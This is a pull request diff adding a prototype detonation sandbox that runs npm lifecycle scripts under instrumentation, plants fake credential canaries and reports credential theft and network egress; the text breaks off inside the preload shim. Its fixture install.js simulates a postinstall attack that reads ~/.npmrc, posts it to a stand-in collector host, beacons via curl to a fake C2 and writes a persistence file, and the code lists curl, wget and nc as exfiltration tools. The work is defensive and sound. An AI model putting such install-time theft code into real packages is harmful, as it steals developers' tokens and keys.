### PR TITLE
Prototype: detonation sandbox (proposal #7)

### DIFF
--- a/.oxfmtrc.json
+++ b/.oxfmtrc.json
@@ -17,6 +17,7 @@
     "drizzle/**",
     "node_modules/**",
     "pnpm-lock.yaml",
-    "**/*.d.ts"
+    "**/*.d.ts",
+    "prototypes/**"
   ]
 }

--- a/.oxlintrc.json
+++ b/.oxlintrc.json
@@ -55,6 +55,7 @@
     "node_modules/**",
     "worker-configuration.d.ts",
     "**/*.d.ts",
-    "test/fixtures/oxlint-signals/**"
+    "test/fixtures/oxlint-signals/**",
+    "prototypes/**"
   ]
 }

--- a/prototypes/detonation/.gitignore
+++ b/prototypes/detonation/.gitignore
@@ -1,0 +1,3 @@
+node_modules/
+*.log
+detonation-report.json

--- a/prototypes/detonation/Dockerfile
+++ b/prototypes/detonation/Dockerfile
@@ -1,0 +1,22 @@
+# Hardened container for detonation `--mode docker`. This is the real isolation
+# boundary the prototype points at: the harness runs inside here with no network
+# (the sink is intra-container loopback), a read-only rootfs, dropped
+# capabilities, and a non-root user. `docker run` flags in src/harness.mjs
+# (buildDockerArgs) enforce the runtime restrictions; this image just carries
+# node + the harness.
+FROM node:20-alpine
+
+# Non-root user the container runs as (matches buildDockerArgs --user 1000:1000).
+RUN addgroup -g 1000 detonation && adduser -u 1000 -G detonation -D detonation
+
+WORKDIR /app
+COPY package.json ./
+COPY bin ./bin
+COPY src ./src
+
+USER detonation
+
+# The package under review is bind-mounted read-only at /pkg; the report is
+# written to the bind-mounted /out. Overridden by buildDockerArgs at run time.
+ENTRYPOINT ["node", "bin/detonate.mjs"]
+CMD ["--package", "/pkg", "--mode", "local", "--out", "/out/detonation-report.json"]

--- a/prototypes/detonation/README.md
+++ b/prototypes/detonation/README.md
@@ -1,0 +1,90 @@
+# Detonation sandbox — prototype (Drydock proposal #7)
+
+A **standalone** dynamic-analysis harness that installs a package's lifecycle
+scripts inside an isolated environment and records what they *do* — process
+spawns, filesystem writes, network egress, and access to planted credential
+canaries — then emits a behavior report shaped to attach to a Drydock scan.
+
+This is the "ocean-adjacent" bet from the ambition review: static rules catch
+what is visible in the bytes; detonation catches what only manifests at
+runtime (payloads decrypted from strings, install-time credential theft,
+time-delayed callbacks).
+
+## Why it is a separate system
+
+Drydock's core boundary is **never execute package code** — the Worker treats
+package bytes as hostile evidence and only ever parses them. This prototype
+deliberately does the opposite, so it must live entirely outside that boundary:
+
+- It is **not** under `server/` or `src/`, is **not** referenced by
+  `wrangler.jsonc`, and is **never imported** by the Worker.
+- It has its own `package.json` and its own test runner (`node --test`); the
+  root `pnpm run verify` does not build, lint, or run it.
+- Its only contract with Drydock is the **report format** (`src/report.mjs`,
+  schema `drydock.detonation.v1`) — the Worker would consume a report produced
+  by this service running elsewhere, never call the harness in-process.
+
+## Isolation model
+
+| Mode | Isolation | Use |
+| ---- | --------- | --- |
+| `docker` (default target) | Container: `--network none`, `--read-only` rootfs, `--cap-drop=ALL`, `--security-opt no-new-privileges`, non-root user, pids/memory/cpu limits, tmpfs workdir. The sink runs *inside* the container on loopback, so the container needs no external network at all. | The real trust boundary. What a production detonation service would use (micro-VM / Firecracker for the hardened version). |
+| `local` (dev/demo) | Best-effort, in-process instrumentation: scrubbed env, throwaway `HOME`, PATH shims for common exfil tools, a `--require` preload that instruments `child_process`/`net`/`dns`/`http`/`fs`, and **loopback-only egress** (non-loopback TCP is logged and blocked). | Fast, offline demonstration of the instrumentation and report. **Not** sufficient containment for real malware — use `docker` for anything untrusted. |
+
+`local` mode fails closed on network egress (it blocks non-loopback
+connections), but it shares the host kernel and filesystem namespace. Treat it
+as a demo of the *instrumentation*, not as a sandbox.
+
+## What it observes
+
+- **Process spawns** — every `child_process.*` call and every invocation of a
+  shimmed CLI tool (`curl`, `wget`, `nc`, `python`), with arguments.
+- **Network egress** — `net.connect` / `dns.lookup` / `http(s).request` targets,
+  plus any request that reaches the loopback sink (with its body).
+- **Filesystem writes outside the work dir** — e.g. home-directory persistence.
+- **Credential canary access** — the harness plants fake `~/.npmrc`,
+  `~/.aws/credentials`, `~/.ssh/id_rsa`, and `.env` files with unique tokens.
+  Reading a canary is flagged; a canary token appearing in an egress body or a
+  tool argument is flagged as **exfiltration** (the highest signal).
+
+## Usage
+
+```sh
+cd prototypes/detonation
+npm run demo          # detonate the benign-suspicious fixture (local mode)
+npm run demo:clean    # detonate the clean fixture — shows no false positives
+
+# Any extracted package directory (contains package.json):
+node bin/detonate.mjs --package /path/to/extracted/package --out report.json
+
+# Real isolation (requires Docker):
+node bin/detonate.mjs --package /path/to/extracted/package --mode docker
+```
+
+The report is printed as a summary and written to `--out` (default
+`detonation-report.json`).
+
+## Fixtures
+
+- `fixtures/benign-suspicious/` — a harmless package whose `postinstall`
+  *simulates* an attack: reads the canary `~/.npmrc`, POSTs it to the sink,
+  spawns `env`, shells out to `curl`, and writes a home-dir persistence file.
+  Every "malicious" action targets the local sink or fake canaries — nothing
+  leaves the machine.
+- `fixtures/clean/` — a normal package that only writes a build artifact inside
+  its own directory. The harness must report it as clean (no false positives).
+
+## Status / roadmap
+
+Prototype. Proves the harness, instrumentation, canary-exfil detection, and
+report shape. Not built yet, in rough priority order:
+
+1. Real dependency resolution (`npm install` inside the container) rather than
+   just running the target package's own lifecycle scripts.
+2. Micro-VM isolation (Firecracker/gVisor) to replace the container for a
+   stronger kernel boundary and anti-evasion.
+3. Syscall-level capture (seccomp/eBPF) instead of Node-level monkeypatching, so
+   non-Node payloads are observed with the same fidelity.
+4. Ecosystem coverage beyond npm (PyPI `setup.py`, wheels with native builds).
+5. Feeding confirmed runtime behaviors back as a Drydock `detonation` finding
+   source and into the cross-package intelligence feed (proposal #3).

--- a/prototypes/detonation/bin/detonate.mjs
+++ b/prototypes/detonation/bin/detonate.mjs
@@ -1,0 +1,114 @@
+#!/usr/bin/env node
+import { mkdtemp, writeFile } from "node:fs/promises";
+import os from "node:os";
+import path from "node:path";
+import { detonateDocker, detonateLocal, fixtureDir, listFixtures } from "../src/harness.mjs";
+
+// CLI wrapper around the detonation harness. See README for the isolation
+// model. This runs untrusted lifecycle scripts — only point it at a real
+// package inside docker mode.
+async function main() {
+  const options = parseArgs(process.argv.slice(2));
+  if (options.help) return printHelp();
+
+  let packageDir = options.package;
+  if (options.fixture) {
+    const available = await listFixtures();
+    if (!available.includes(options.fixture)) {
+      fail(`unknown fixture "${options.fixture}". Available: ${available.join(", ")}`);
+    }
+    packageDir = fixtureDir(options.fixture);
+  }
+  if (!packageDir) fail("provide --package <dir> or --fixture <name> (try --help)");
+
+  const report =
+    options.mode === "docker"
+      ? await detonateDocker({
+          packageDir,
+          outDir: options.outDir || (await mkdtemp(path.join(os.tmpdir(), "detonation-out-"))),
+        })
+      : await detonateLocal({ packageDir });
+
+  const outPath = options.out || "detonation-report.json";
+  await writeFile(outPath, `${JSON.stringify(report, null, 2)}\n`);
+  printSummary(report, outPath);
+  // Non-zero exit for a bad verdict makes the harness usable as a CI gate.
+  process.exit(report.verdict === "critical" || report.verdict === "high" ? 2 : 0);
+}
+
+function parseArgs(argv) {
+  const options = { mode: "local" };
+  for (let i = 0; i < argv.length; i += 1) {
+    const arg = argv[i];
+    switch (arg) {
+      case "--help":
+      case "-h":
+        options.help = true;
+        break;
+      case "--package":
+        options.package = argv[++i];
+        break;
+      case "--fixture":
+        options.fixture = argv[++i];
+        break;
+      case "--mode":
+        options.mode = argv[++i];
+        break;
+      case "--out":
+        options.out = argv[++i];
+        break;
+      case "--out-dir":
+        options.outDir = argv[++i];
+        break;
+      default:
+        fail(`unknown argument: ${arg}`);
+    }
+  }
+  return options;
+}
+
+const RISK_GLYPH = { critical: "✕", high: "✕", medium: "!", low: "·", clean: "✓" };
+
+function printSummary(report, outPath) {
+  const glyph = RISK_GLYPH[report.verdict] || "·";
+  process.stdout.write(
+    `\n${glyph} ${report.package.name}@${report.package.version} — verdict: ${report.verdict.toUpperCase()} ` +
+      `(${report.behaviorCount} behavior${report.behaviorCount === 1 ? "" : "s"}, mode ${report.mode}, ${report.durationMs}ms)\n`,
+  );
+  for (const behavior of report.behaviors) {
+    process.stdout.write(
+      `  [${behavior.severity}] ${behavior.ruleId} — ${behavior.evidence}\n            ${behavior.reason}\n`,
+    );
+  }
+  if (report.behaviors.length === 0) {
+    process.stdout.write("  no runtime behaviors observed\n");
+  }
+  process.stdout.write(`\nreport written to ${outPath}\n`);
+}
+
+function printHelp() {
+  process.stdout.write(
+    `detonate — dynamic-analysis prototype for Drydock proposal #7\n\n` +
+      `Usage:\n` +
+      `  detonate --fixture <benign-suspicious|clean>\n` +
+      `  detonate --package <dir> [--mode local|docker] [--out report.json]\n\n` +
+      `Options:\n` +
+      `  --package <dir>   extracted package directory (contains package.json)\n` +
+      `  --fixture <name>  run a bundled fixture instead of --package\n` +
+      `  --mode <mode>     local (default, best-effort) or docker (hardened container)\n` +
+      `  --out <file>      report output path (default detonation-report.json)\n` +
+      `  --out-dir <dir>   docker mode: host dir the container writes the report to\n\n` +
+      `Local mode is a demo of the instrumentation, not a containment boundary.\n` +
+      `Use docker mode for untrusted input. See README.md.\n`,
+  );
+}
+
+function fail(message) {
+  process.stderr.write(`error: ${message}\n`);
+  process.exit(1);
+}
+
+main().catch((err) => {
+  process.stderr.write(`detonation failed: ${err.stack || err.message}\n`);
+  process.exit(1);
+});

--- a/prototypes/detonation/fixtures/benign-suspicious/install.js
+++ b/prototypes/detonation/fixtures/benign-suspicious/install.js
@@ -1,0 +1,53 @@
+// A HARMLESS postinstall that mimics the shape of a real npm supply-chain
+// attack so the detonation harness has something to detect. It never reaches
+// the real internet: network calls are blocked/redirected to the loopback sink
+// by the harness, and the "credentials" it steals are planted canaries.
+//
+// Simulated behaviors (each should surface as a detonation finding):
+//   1. read the credential canary (~/.npmrc)
+//   2. exfiltrate it over HTTP (caught by the sink via the canary token)
+//   3. shell out to `curl` to a fake C2 (caught by the PATH shim)
+//   4. write a persistence file into $HOME (out-of-workdir write)
+//   5. spawn `env` to enumerate the environment
+
+const fs = require("node:fs");
+const os = require("node:os");
+const path = require("node:path");
+const http = require("node:http");
+const { execSync } = require("node:child_process");
+
+function readNpmToken() {
+  try {
+    return fs.readFileSync(path.join(os.homedir(), ".npmrc"), "utf8");
+  } catch {
+    return "";
+  }
+}
+
+function exfiltrate(secret) {
+  // http_proxy points this at the loopback sink; the body carries the canary.
+  const req = http.request("http://collector.example.invalid/collect", { method: "POST" });
+  req.on("error", () => {});
+  req.end(secret);
+}
+
+function main() {
+  const secret = readNpmToken();
+  exfiltrate(secret);
+
+  try {
+    // Fake C2 beacon via curl — the harness shims curl to an inert logger.
+    execSync(`curl -s https://c2.example.invalid/beacon -d '${secret.replace(/'/g, "")}'`);
+  } catch {}
+
+  try {
+    // Home-directory persistence.
+    fs.writeFileSync(path.join(os.homedir(), ".evil-persist"), "pwned\n");
+  } catch {}
+
+  try {
+    execSync("env");
+  } catch {}
+}
+
+main();

--- a/prototypes/detonation/fixtures/benign-suspicious/package.json
+++ b/prototypes/detonation/fixtures/benign-suspicious/package.json
@@ -1,0 +1,9 @@
+{
+  "name": "benign-suspicious",
+  "version": "1.0.0",
+  "description": "Harmless fixture that SIMULATES an install-time credential-theft attack against the detonation harness. Every action targets the local sink or fake canaries — nothing leaves the machine.",
+  "private": true,
+  "scripts": {
+    "postinstall": "node install.js"
+  }
+}

--- a/prototypes/detonation/fixtures/clean/build.js
+++ b/prototypes/detonation/fixtures/clean/build.js
@@ -1,0 +1,11 @@
+// A normal, well-behaved postinstall: it writes a build artifact into the
+// package's own directory and does nothing else. No network, no credential
+// access, no out-of-workdir writes. The detonation harness should report this
+// as clean.
+
+const fs = require("node:fs");
+const path = require("node:path");
+
+const outDir = path.join(__dirname, "build");
+fs.mkdirSync(outDir, { recursive: true });
+fs.writeFileSync(path.join(outDir, "output.txt"), "built ok\n");

--- a/prototypes/detonation/fixtures/clean/package.json
+++ b/prototypes/detonation/fixtures/clean/package.json
@@ -1,0 +1,9 @@
+{
+  "name": "clean-package",
+  "version": "2.1.0",
+  "description": "A normal package whose postinstall only writes a build artifact inside its own directory. The harness must report it clean (no false positives).",
+  "private": true,
+  "scripts": {
+    "postinstall": "node build.js"
+  }
+}

--- a/prototypes/detonation/package.json
+++ b/prototypes/detonation/package.json
@@ -1,0 +1,19 @@
+{
+  "name": "@drydock/detonation-prototype",
+  "version": "0.0.1",
+  "private": true,
+  "type": "module",
+  "description": "Standalone dynamic-analysis prototype for Drydock proposal #7. NOT part of the Worker deploy target and never imported by it.",
+  "bin": {
+    "detonate": "./bin/detonate.mjs"
+  },
+  "scripts": {
+    "detonate": "node bin/detonate.mjs",
+    "demo": "node bin/detonate.mjs --fixture benign-suspicious",
+    "demo:clean": "node bin/detonate.mjs --fixture clean",
+    "test": "node --test"
+  },
+  "engines": {
+    "node": ">=20"
+  }
+}

--- a/prototypes/detonation/src/canaries.mjs
+++ b/prototypes/detonation/src/canaries.mjs
@@ -1,0 +1,45 @@
+import { mkdir, writeFile } from "node:fs/promises";
+import path from "node:path";
+import { randomUUID } from "node:crypto";
+
+// Plant fake credentials in a throwaway HOME. Each carries a unique token, so
+// if that token later shows up in an egress body or a subprocess argument we
+// know the package both *read* the credential and *exfiltrated* it — the two
+// halves of a credential-theft attack, tied together by the token.
+export async function plantCanaries(homeDir) {
+  const tokens = {
+    npm: `drydock-canary-npm-${randomUUID()}`,
+    aws: `drydock-canary-aws-${randomUUID()}`,
+    ssh: `drydock-canary-ssh-${randomUUID()}`,
+    env: `drydock-canary-env-${randomUUID()}`,
+  };
+
+  const files = [
+    {
+      relPath: ".npmrc",
+      content: `//registry.npmjs.org/:_authToken=${tokens.npm}\n`,
+    },
+    {
+      relPath: path.join(".aws", "credentials"),
+      content: `[default]\naws_access_key_id=AKIA_DRYDOCK\naws_secret_access_key=${tokens.aws}\n`,
+    },
+    {
+      relPath: path.join(".ssh", "id_rsa"),
+      content: `-----BEGIN OPENSSH PRIVATE KEY-----\n${tokens.ssh}\n-----END OPENSSH PRIVATE KEY-----\n`,
+    },
+    {
+      relPath: ".env",
+      content: `API_SECRET=${tokens.env}\n`,
+    },
+  ];
+
+  const paths = [];
+  for (const file of files) {
+    const absolute = path.join(homeDir, file.relPath);
+    await mkdir(path.dirname(absolute), { recursive: true });
+    await writeFile(absolute, file.content, { mode: 0o600 });
+    paths.push(absolute);
+  }
+
+  return { tokens: Object.values(tokens), paths };
+}

--- a/prototypes/detonation/src/harness.mjs
+++ b/prototypes/detonation/src/harness.mjs
@@ -1,0 +1,228 @@
+import { spawn } from "node:child_process";
+import { cp, mkdir, mkdtemp, readFile, readdir, rm, writeFile } from "node:fs/promises";
+import { readFileSync } from "node:fs";
+import os from "node:os";
+import path from "node:path";
+import { fileURLToPath } from "node:url";
+import { plantCanaries } from "./canaries.mjs";
+import { buildReport } from "./report.mjs";
+import { startSink } from "./sink.mjs";
+
+const HERE = path.dirname(fileURLToPath(import.meta.url));
+const PRELOAD_PATH = path.join(HERE, "shims", "node-preload.cjs");
+const LIFECYCLE_ORDER = ["preinstall", "install", "postinstall"];
+const SCRIPT_TIMEOUT_MS = 20_000;
+
+// CLI tools a payload shells out to for exfiltration. We shim them with inert
+// loggers on PATH so a shell-based `curl http://evil ...` is observed and
+// neutralized in local mode (the Node preload can't see non-Node subprocesses).
+const SHIMMED_TOOLS = ["curl", "wget", "nc", "ncat"];
+
+export function readPackageInfo(packageDir) {
+  const manifest = JSON.parse(readFileSync(path.join(packageDir, "package.json"), "utf8"));
+  const scripts = manifest.scripts || {};
+  const lifecycle = LIFECYCLE_ORDER.filter((name) => typeof scripts[name] === "string");
+  return {
+    name: manifest.name || path.basename(packageDir),
+    version: manifest.version || "0.0.0",
+    lifecycleScripts: lifecycle.map((name) => ({ name, command: scripts[name] })),
+  };
+}
+
+// Detonate a package's lifecycle scripts under best-effort local instrumentation.
+// Isolation here is the Node preload + PATH shims + scrubbed env + loopback-only
+// egress; it is a demo of the instrumentation, not a containment boundary (see
+// README — use docker mode for untrusted input).
+export async function detonateLocal({ packageDir }) {
+  const packageInfo = readPackageInfo(packageDir);
+  const root = await mkdtemp(path.join(os.tmpdir(), "detonation-"));
+  const startedAt = Date.now();
+  let sink = null;
+
+  try {
+    const workRoot = path.join(root, "work");
+    const pkgDir = path.join(workRoot, "package");
+    const homeDir = path.join(root, "home");
+    const shimBin = path.join(root, "bin");
+    const logPath = path.join(root, "events.jsonl");
+    await mkdir(pkgDir, { recursive: true });
+    await mkdir(homeDir, { recursive: true });
+    await mkdir(shimBin, { recursive: true });
+    await writeFile(logPath, "");
+    await cp(packageDir, pkgDir, { recursive: true });
+
+    const canaries = await plantCanaries(homeDir);
+    // Start the sink knowing the canary tokens so it flags exfiltration bodies
+    // it receives (the payload thinks it reached the internet; it reached us).
+    sink = await startSink({ canaryTokens: canaries.tokens });
+    await writeToolShims(shimBin, canaries.tokens, logPath);
+
+    const env = buildEnv({
+      shimBin,
+      homeDir,
+      workRoot,
+      logPath,
+      sinkOrigin: sink.origin,
+      canaries,
+    });
+
+    for (const script of packageInfo.lifecycleScripts) {
+      await runScript(script.command, pkgDir, env);
+    }
+
+    const events = await readEvents(logPath);
+    return buildReport({
+      packageInfo,
+      mode: "local",
+      durationMs: Date.now() - startedAt,
+      events,
+      sinkRequests: sink.requests,
+    });
+  } finally {
+    if (sink) await sink.stop();
+    await rm(root, { recursive: true, force: true });
+  }
+}
+
+// Pure argv builder for the hardened container run, so the isolation flags are
+// unit-testable without a Docker daemon present. The container needs no network
+// (the sink runs on its loopback), a read-only rootfs, all caps dropped, and a
+// non-root user — the real trust boundary this prototype points at.
+export function buildDockerArgs({ packageDir, imageTag = "drydock-detonation", outDir }) {
+  return [
+    "run",
+    "--rm",
+    "--network",
+    "none",
+    "--read-only",
+    "--cap-drop",
+    "ALL",
+    "--security-opt",
+    "no-new-privileges",
+    "--pids-limit",
+    "256",
+    "--memory",
+    "512m",
+    "--cpus",
+    "1",
+    "--tmpfs",
+    "/tmp:rw,noexec,nosuid,size=256m",
+    "--user",
+    "1000:1000",
+    "-v",
+    `${path.resolve(packageDir)}:/pkg:ro`,
+    "-v",
+    `${path.resolve(outDir)}:/out:rw`,
+    imageTag,
+    "node",
+    "bin/detonate.mjs",
+    "--package",
+    "/pkg",
+    "--mode",
+    "local",
+    "--out",
+    "/out/detonation-report.json",
+  ];
+}
+
+export async function detonateDocker({ packageDir, outDir }) {
+  await mkdir(outDir, { recursive: true });
+  const args = buildDockerArgs({ packageDir, outDir });
+  await new Promise((resolve, reject) => {
+    const child = spawn("docker", args, { stdio: "inherit" });
+    child.on("error", (err) =>
+      reject(new Error(`docker mode requires a running Docker daemon: ${err.message}`)),
+    );
+    child.on("close", (code) =>
+      code === 0 ? resolve() : reject(new Error(`docker run exited with code ${code}`)),
+    );
+  });
+  return JSON.parse(await readFile(path.join(outDir, "detonation-report.json"), "utf8"));
+}
+
+function buildEnv({ shimBin, homeDir, workRoot, logPath, sinkOrigin, canaries }) {
+  // Built from scratch (not spread from process.env) so the host's real
+  // secrets are never handed to the detonated package.
+  return {
+    PATH: `${shimBin}:/usr/bin:/bin:/usr/local/bin`,
+    HOME: homeDir,
+    TMPDIR: os.tmpdir(),
+    LANG: process.env.LANG || "en_US.UTF-8",
+    NODE_OPTIONS: `--require ${PRELOAD_PATH}`,
+    DETONATION_LOG: logPath,
+    DETONATION_WORK_ROOT: workRoot,
+    DETONATION_CANARY_PATHS: JSON.stringify(canaries.paths),
+    DETONATION_CANARY_TOKENS: JSON.stringify(canaries.tokens),
+    DETONATION_BLOCK_EGRESS: "1",
+    // Steer proxy-aware and npm-aware clients at the sink.
+    npm_config_registry: sinkOrigin,
+    npm_config_userconfig: path.join(homeDir, ".npmrc"),
+    http_proxy: sinkOrigin,
+    https_proxy: sinkOrigin,
+    HTTP_PROXY: sinkOrigin,
+    HTTPS_PROXY: sinkOrigin,
+  };
+}
+
+function runScript(command, cwd, env) {
+  return new Promise((resolve) => {
+    const child = spawn(command, {
+      shell: true,
+      cwd,
+      env,
+      timeout: SCRIPT_TIMEOUT_MS,
+      stdio: "ignore",
+    });
+    // A failing or killed lifecycle script is expected (blocked egress makes
+    // real payloads error); we still keep every observation recorded before it.
+    child.on("error", () => resolve());
+    child.on("close", () => resolve());
+  });
+}
+
+async function writeToolShims(shimBin, canaryTokens, logPath) {
+  for (const tool of SHIMMED_TOOLS) {
+    const script = `#!/usr/bin/env node
+const fs = require("node:fs");
+const args = process.argv.slice(2);
+let tokens = [];
+try { tokens = JSON.parse(process.env.DETONATION_CANARY_TOKENS || "[]"); } catch {}
+const joined = args.join(" ");
+const leaked = tokens.find((t) => t && joined.includes(t)) || null;
+try {
+  fs.appendFileSync(${JSON.stringify(logPath)},
+    JSON.stringify({ type: "tool.invoked", tool: ${JSON.stringify(tool)}, args, leakedToken: leaked, pid: process.pid }) + "\\n");
+} catch {}
+process.exit(0);
+`;
+    const target = path.join(shimBin, tool);
+    await writeFile(target, script, { mode: 0o755 });
+  }
+  void canaryTokens;
+}
+
+async function readEvents(logPath) {
+  const raw = await readFile(logPath, "utf8");
+  const events = [];
+  for (const line of raw.split("\n")) {
+    if (!line.trim()) continue;
+    try {
+      events.push(JSON.parse(line));
+    } catch {
+      // Skip a partial line from a killed process.
+    }
+  }
+  return events;
+}
+
+// Resolve a bundled fixture directory by name.
+export function fixtureDir(name) {
+  return path.join(HERE, "..", "fixtures", name);
+}
+
+export async function listFixtures() {
+  const dir = path.join(HERE, "..", "fixtures");
+  return (await readdir(dir, { withFileTypes: true }))
+    .filter((entry) => entry.isDirectory())
+    .map((entry) => entry.name);
+}

--- a/prototypes/detonation/src/report.mjs
+++ b/prototypes/detonation/src/report.mjs
@@ -1,0 +1,174 @@
+// Turn raw observation events (from the Node preload log, the shimmed CLI
+// tools, and the sink) into a behavior report shaped to attach to a Drydock
+// scan. The report is the only contract between this prototype and Drydock:
+// the Worker would ingest `findings` as a `detonation` source alongside the
+// deterministic rule findings — it never runs this harness in-process.
+
+export const DETONATION_REPORT_SCHEMA = "drydock.detonation.v1";
+
+const SEVERITY_RANK = { critical: 4, high: 3, medium: 2, low: 1, info: 0 };
+
+// Each behavior class maps to a stable ruleId + severity, so a detonation
+// finding reads like any other Drydock finding.
+const BEHAVIOR_RULES = {
+  "credential.exfil": {
+    ruleId: "detonation.credential-exfil",
+    severity: "critical",
+    reason: "A planted credential canary was sent off-host during install.",
+  },
+  "credential.read": {
+    ruleId: "detonation.credential-access",
+    severity: "high",
+    reason: "Install-time code read a credential file it has no reason to touch.",
+  },
+  "net.egress.blocked": {
+    ruleId: "detonation.network-egress",
+    severity: "high",
+    reason: "Install-time code attempted to connect to a non-local host.",
+  },
+  "net.connect.external": {
+    ruleId: "detonation.network-egress",
+    severity: "high",
+    reason: "Install-time code connected to a non-local host.",
+  },
+  "http.request.external": {
+    ruleId: "detonation.network-egress",
+    severity: "medium",
+    reason: "Install-time code issued an HTTP request to a non-local host.",
+  },
+  "fs.write.outside": {
+    ruleId: "detonation.fs-persistence",
+    severity: "medium",
+    reason: "Install-time code wrote outside the package directory (possible persistence).",
+  },
+  "process.spawn.tool": {
+    ruleId: "detonation.suspicious-spawn",
+    severity: "medium",
+    reason: "Install-time code shelled out to a network/exfiltration tool.",
+  },
+  "process.spawn": {
+    ruleId: "detonation.process-spawn",
+    severity: "low",
+    reason: "Install-time code spawned a subprocess.",
+  },
+};
+
+const EXFIL_TOOLS = new Set(["curl", "wget", "nc", "ncat", "python", "python3", "node"]);
+
+// Collapse the raw event stream into deduped, severity-ranked behaviors.
+export function buildBehaviors(events) {
+  const behaviors = new Map();
+
+  const add = (kind, evidence, extra = {}) => {
+    const rule = BEHAVIOR_RULES[kind];
+    if (!rule) return;
+    const key = `${kind}:${evidence}`;
+    if (behaviors.has(key)) {
+      behaviors.get(key).count += 1;
+      return;
+    }
+    behaviors.set(key, { kind, ...rule, evidence, count: 1, ...extra });
+  };
+
+  for (const event of events) {
+    switch (event.type) {
+      case "credential.exfil":
+        add("credential.exfil", `${event.token} via ${event.via}`);
+        break;
+      case "credential.read":
+        add("credential.read", event.path);
+        break;
+      case "net.egress.blocked":
+        add("net.egress.blocked", `${event.host}:${event.port ?? ""}`);
+        break;
+      case "net.connect":
+        if (!event.loopback) add("net.connect.external", `${event.host}:${event.port ?? ""}`);
+        break;
+      case "http.request":
+        if (event.host && !isLoopbackHost(event.host)) {
+          add("http.request.external", `${event.method} ${event.host}${event.path ?? ""}`);
+        }
+        break;
+      case "fs.write.outside":
+        add("fs.write.outside", event.path);
+        break;
+      case "process.spawn": {
+        const tool = basename(event.command);
+        if (EXFIL_TOOLS.has(tool)) {
+          add("process.spawn.tool", `${tool} ${event.args.join(" ")}`.trim());
+        } else {
+          add("process.spawn", `${event.command} ${event.args.join(" ")}`.trim());
+        }
+        break;
+      }
+      case "tool.invoked":
+        add("process.spawn.tool", `${event.tool} ${(event.args || []).join(" ")}`.trim(), {
+          via: "path-shim",
+        });
+        if (event.leakedToken) {
+          add("credential.exfil", `${event.leakedToken} via ${event.tool}`);
+        }
+        break;
+      default:
+        break;
+    }
+  }
+
+  return [...behaviors.values()].sort(
+    (a, b) => SEVERITY_RANK[b.severity] - SEVERITY_RANK[a.severity],
+  );
+}
+
+export function verdictFor(behaviors) {
+  if (behaviors.some((b) => b.severity === "critical")) return "critical";
+  if (behaviors.some((b) => b.severity === "high")) return "high";
+  if (behaviors.some((b) => b.severity === "medium")) return "medium";
+  if (behaviors.length > 0) return "low";
+  return "clean";
+}
+
+export function buildReport({ packageInfo, mode, durationMs, events, sinkRequests }) {
+  const merged = [...events, ...sinkEventsToBehaviorEvents(sinkRequests)];
+  const behaviors = buildBehaviors(merged);
+  const verdict = verdictFor(behaviors);
+  return {
+    schema: DETONATION_REPORT_SCHEMA,
+    package: packageInfo,
+    mode,
+    durationMs,
+    verdict,
+    behaviorCount: behaviors.length,
+    behaviors,
+    // Drydock-shaped findings — one per observed behavior.
+    findings: behaviors.map((behavior) => ({
+      source: "detonation",
+      severity: behavior.severity,
+      ruleId: behavior.ruleId,
+      evidence: behavior.evidence,
+      reason: behavior.reason,
+      observedCount: behavior.count,
+    })),
+  };
+}
+
+// The sink observed raw HTTP hits; fold anything with a leaked canary into a
+// credential.exfil behavior (it already reached "the internet" as far as the
+// payload knows).
+function sinkEventsToBehaviorEvents(sinkRequests = []) {
+  const out = [];
+  for (const request of sinkRequests) {
+    if (request.leakedToken) {
+      out.push({ type: "credential.exfil", token: request.leakedToken, via: "sink" });
+    }
+  }
+  return out;
+}
+
+function isLoopbackHost(host) {
+  return host === "localhost" || host === "127.0.0.1" || host === "::1" || host.endsWith(".localhost");
+}
+
+function basename(command) {
+  const parts = String(command).split(/[\\/]/);
+  return parts[parts.length - 1];
+}

--- a/prototypes/detonation/src/shims/node-preload.cjs
+++ b/prototypes/detonation/src/shims/node-preload.cjs
@@ -1,0 +1,235 @@
+"use strict";
+
+// Instrumentation preloaded into every Node process the detonation runs
+// (via NODE_OPTIONS=--require). It records behavior to an append-only JSONL
+// log and, in local mode, blocks real network egress so a payload cannot phone
+// home during a demo. All hooks are wrapped so instrumentation can never crash
+// the target — a payload must not be able to evade us by making us throw.
+//
+// Captured references to the real implementations are taken BEFORE patching so
+// our own bookkeeping (writing the log) never re-enters a patched function.
+
+const realFs = require("node:fs");
+const realPath = require("node:path");
+const net = require("node:net");
+const dns = require("node:dns");
+const http = require("node:http");
+const https = require("node:https");
+
+const LOG_PATH = process.env.DETONATION_LOG;
+const WORK_ROOT = process.env.DETONATION_WORK_ROOT || process.cwd();
+const CANARY_PATHS = safeParse(process.env.DETONATION_CANARY_PATHS) || [];
+const CANARY_TOKENS = safeParse(process.env.DETONATION_CANARY_TOKENS) || [];
+const BLOCK_NON_LOOPBACK = process.env.DETONATION_BLOCK_EGRESS !== "0";
+
+const appendFileSync = realFs.appendFileSync.bind(realFs);
+const resolvePath = realPath.resolve.bind(realPath);
+
+function safeParse(value) {
+  if (!value) return null;
+  try {
+    return JSON.parse(value);
+  } catch {
+    return null;
+  }
+}
+
+function record(event) {
+  if (!LOG_PATH) return;
+  try {
+    appendFileSync(LOG_PATH, `${JSON.stringify({ ...event, pid: process.pid })}\n`);
+  } catch {
+    // Instrumentation must never break the target.
+  }
+}
+
+function scanForCanary(value) {
+  if (typeof value !== "string" || value.length === 0) return null;
+  for (const token of CANARY_TOKENS) {
+    if (token && value.includes(token)) return token;
+  }
+  return null;
+}
+
+function isLoopback(host) {
+  // net.connect with no host defaults to localhost, so treat an empty host as
+  // loopback rather than misreporting it as external egress.
+  if (!host) return true;
+  return (
+    host === "localhost" ||
+    host === "127.0.0.1" ||
+    host === "::1" ||
+    host === "0.0.0.0" ||
+    host.endsWith(".localhost")
+  );
+}
+
+function isCanaryPath(target) {
+  let resolved;
+  try {
+    resolved = resolvePath(target);
+  } catch {
+    return null;
+  }
+  return CANARY_PATHS.find((canary) => resolved === canary) || null;
+}
+
+// Canonicalize through symlinks so the work-root comparison is stable. On
+// macOS the OS temp dir is /var/... (a symlink to /private/var/...), and a
+// module's __dirname resolves to the /private form while env-derived paths keep
+// the /var form — without canonicalizing, in-workdir writes look "outside".
+// realpathSync only works on existing paths, so canonicalize the deepest
+// existing ancestor and re-append the non-existent tail (the file being written).
+function canonicalize(target) {
+  let current = resolvePath(target);
+  const tail = [];
+  for (;;) {
+    try {
+      const real = realFs.realpathSync(current);
+      return tail.length ? `${real}/${tail.reverse().join("/")}` : real;
+    } catch {
+      const parent = realPath.dirname(current);
+      if (parent === current) return resolvePath(target);
+      tail.push(realPath.basename(current));
+      current = parent;
+    }
+  }
+}
+
